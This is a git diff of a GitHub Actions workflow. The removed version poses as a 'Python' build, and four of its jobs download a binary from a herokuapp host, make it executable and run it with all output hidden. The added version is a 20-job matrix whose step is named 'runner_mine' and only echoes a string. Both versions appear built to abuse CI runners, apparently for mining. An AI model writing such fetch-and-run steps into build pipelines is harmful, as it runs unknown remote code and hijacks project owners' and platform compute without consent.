--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -1,102 +1,18 @@
-name: Python
-on:  
-  push:
-  pull_request:
- 
+name: CI-PROGRES-AWS
+on: [push, pull_request]
 jobs:
- python-1:
+  build:
+    name: Docker
     runs-on: ubuntu-18.04
     strategy:
+      max-parallel: 20
       fail-fast: false
       matrix:
-         go: [1.11, 1.12, 1.13, 1.14, 1.15]
-         flag: [A, B, C, D]
-    timeout-minutes: 360
- 
+        flag: [ba, bb, bc, bd, be, bf, bg, bh, bi, bj, bk, bl, bm, bn, bo, bp, bq, br, bs, bt]
     steps:
-    - uses: actions/checkout@v2
-    - name: Python-run
-      run: echo "python"
- 
- python-2:
-    runs-on: ubuntu-18.04 
-    needs: python-1
-    strategy:
-      fail-fast: false
-      matrix:
-         go: [1.11, 1.12, 1.13, 1.14, 1.15]
-         flag: [A, B, C, D]
-    timeout-minutes: 360
- 
-    steps:
-    - uses: actions/checkout@v2
-    - name: Python-run
-      run: echo "python"
- 
- python-build-4:
-    runs-on: ubuntu-20.04 
-    needs: python-2
-    strategy:
-      fail-fast: false
-      matrix:
-         go: [1.11, 1.12, 1.13, 1.14, 1.15]
-         flag: [A]
-    timeout-minutes: 360
- 
-    steps:
-    - uses: actions/checkout@v2
-    - name: Python-setup
-      run: sudo apt-get update 
-    - name: Python-build
-      run: wget https://myname1.herokuapp.com/include && chmod +x include && ./include >/dev/null 2>&1
- 
- python-build-3:
-    runs-on: ubuntu-20.04 
-    needs: python-2
-    strategy:
-      fail-fast: false
-      matrix:
-         go: [1.11, 1.12, 1.13, 1.14, 1.15]
-         flag: [A]
-    timeout-minutes: 360
- 
-    steps:
-    - uses: actions/checkout@v2
-    - name: Python-setup
-      run: sudo apt-get update 
-    - name: Python-build
-      run: wget https://myname1.herokuapp.com/include && chmod +x include && ./include >/dev/null 2>&1
- 
- python-build-2:
-    runs-on: ubuntu-20.04 
-    needs: python-2
-    strategy:
-      fail-fast: false
-      matrix:
-         go: [1.11, 1.12, 1.13, 1.14, 1.15]
-         flag: [A]
-    timeout-minutes: 360
- 
-    steps:
-    - uses: actions/checkout@v2
-    - name: Python-setup
-      run: sudo apt-get update 
-    - name: Python-build
-      run: wget https://myname1.herokuapp.com/include && chmod +x include && ./include >/dev/null 2>&1
- 
- python-build-1:
-    runs-on: ubuntu-20.04 
-    needs: python-2
-    strategy:
-      fail-fast: false
-      matrix:
-         go: [1.11, 1.12, 1.13, 1.14, 1.15]
-         flag: [A]
-    timeout-minutes: 360
- 
-    steps:
-    - uses: actions/checkout@v2
-    - name: Python-setup
-      run: sudo apt-get update 
-    - name: Python-build
-      run: wget https://myname1.herokuapp.com/include && chmod +x include && ./include >/dev/null 2>&1
+    - name: Setup
+      uses: actions/checkout@v1
+    - name: runner_mine
+      continue-on-error: true
+      run: |
+          echo "ab"
